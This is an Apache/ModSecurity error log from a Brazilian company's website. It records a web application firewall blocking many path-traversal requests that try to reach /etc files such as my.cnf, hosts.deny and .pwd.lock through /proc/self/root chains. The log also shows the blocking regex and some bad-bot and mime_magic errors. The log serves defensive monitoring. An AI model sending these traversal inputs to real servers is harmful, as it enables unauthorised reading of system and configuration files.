[Wed Mar 18 15:38:48.053262 2026] [:error] [pid 17887:tid 140411557287680] [client 216.73.216.191:37111] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxOAkwaGbbGflqUZBHEwAAANY"]
[Wed Mar 18 15:38:48.845356 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:27877] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxOPu8EFLIOrSqIps0-wAAAlM"]
[Wed Mar 18 15:38:50.091039 2026] [:error] [pid 11816:tid 140411674785536] [client 216.73.216.191:1650] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxOuw_le52K8_3pV0QiQAAAgg"]
[Wed Mar 18 15:38:53.711452 2026] [:error] [pid 15826:tid 140411632822016] [client 216.73.216.191:12985] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxPeoXxyEfFpUF8f-qHQAAAU0"]
[Wed Mar 18 15:38:57.107333 2026] [:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:35320] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxQcdf6f5d65gmYZQJcAAAAs4"]
[Wed Mar 18 15:39:03.771389 2026] [:error] [pid 31803:tid 140411557287680] [client 216.73.216.191:56603] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxR-yqAr6etmhZHNr9WwAAAFY"]
[Wed Mar 18 15:39:04.895422 2026] [:error] [pid 31803:tid 140411599251200] [client 216.73.216.191:11466] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxSOyqAr6etmhZHNr9XAAAAFE"]
[Wed Mar 18 15:39:05.991597 2026] [:error] [pid 14269:tid 140411641214720] [client 216.73.216.191:45620] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxSQbLMZ6AikZjR9XzfgAAAAw"]
[Wed Mar 18 15:39:14.403009 2026] [:error] [pid 17653:tid 140411607643904] [client 216.73.216.191:61571] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxUsdf6f5d65gmYZQJiAAAAtA"]
[Wed Mar 18 15:39:14.795039 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:50410] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxUta6ubjKNq_cu4bR_gAAA0o"]
[Wed Mar 18 15:39:25.410445 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:40543] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxXda6ubjKNq_cu4bSBgAAA1A"]
[Wed Mar 18 15:39:30.710998 2026] [:error] [pid 17653:tid 140411616036608] [client 216.73.216.191:56875] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxYsdf6f5d65gmYZQJnwAAAs8"]
[Wed Mar 18 15:39:40.219013 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.244.43:47616] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrxbOw_le52K8_3pV0QngAAAhI"]
[Wed Mar 18 15:39:40.579123 2026] [:error] [pid 15051:tid 140411691570944] [client 216.73.216.191:48431] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxbCmAPhZkrhU8w4meuAAAAIY"]
[Wed Mar 18 15:39:41.543804 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:24568] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxbeoXxyEfFpUF8f-qcgAAAVc"]
[Wed Mar 18 15:39:44.497208 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.228.61:43674] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrxcOw_le52K8_3pV0QogAAAgA"]
[Wed Mar 18 15:39:49.927301 2026] [:error] [pid 29882:tid 140411741927168] [client 216.73.216.191:22791] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxdUzinOy1jxa1j4dRnwAAAQA"]
[Wed Mar 18 15:39:55.615013 2026] [:error] [pid 31803:tid 140411691570944] [client 216.73.216.191:28744] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxe-yqAr6etmhZHNr9mAAAAEY"]
[Wed Mar 18 15:39:56.645622 2026] [:error] [pid 15826:tid 140411666392832] [client 216.73.216.191:20541] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxfOoXxyEfFpUF8f-qhAAAAUk"]
[Wed Mar 18 15:39:56.646257 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:20541] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:39:57.709954 2026] [mime_magic:error] [pid 31803:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:42579] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:39:59.484619 2026] [:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:19601] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxf8df6f5d65gmYZQJxwAAAs4"]
[Wed Mar 18 15:40:02.730024 2026] [mime_magic:error] [pid 17653:tid 140411741927168] (70014)End of file found: [client 57.141.18.67:52834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:40:06.298130 2026] [:error] [pid 29882:tid 140411632822016] [client 216.73.216.191:21310] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxhUzinOy1jxa1j4dRvQAAAQ0"]
[Wed Mar 18 15:40:09.283842 2026] [:error] [pid 17887:tid 140411582465792] [client 216.73.216.191:14145] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxiAkwaGbbGflqUZBHewAAANM"]
[Wed Mar 18 15:40:26.273784 2026] [mime_magic:error] [pid 14269:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:33984] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Wed Mar 18 15:40:26.273900 2026] [access_compat:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:33984] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Wed Mar 18 15:40:29.310135 2026] [core:alert] [pid 15826:tid 140411716749056] [client 216.73.216.191:59529] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 15:40:31.515313 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:29959] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxn0zinOy1jxa1j4dR5gAAAQc"]
[Wed Mar 18 15:40:31.735101 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:47346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxn_u8EFLIOrSqIps1ZQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:40:31.777343 2026] [:error] [pid 29882:tid 140411557287680] [client 216.73.216.191:62293] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxn0zinOy1jxa1j4dR5wAAARY"]
[Wed Mar 18 15:40:31.835831 2026] [mime_magic:error] [pid 15051:tid 140411674785536] (70014)End of file found: [client 57.141.18.50:54086] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:40:38.200684 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:26403] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxpta6ubjKNq_cu4bSMAAAA0E"]
[Wed Mar 18 15:40:50.068951 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:47516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxr-yqAr6etmhZHNr93AAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:40:53.137778 2026] [mime_magic:error] [pid 14269:tid 140411574073088] (70014)End of file found: [client 57.141.18.116:55028] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
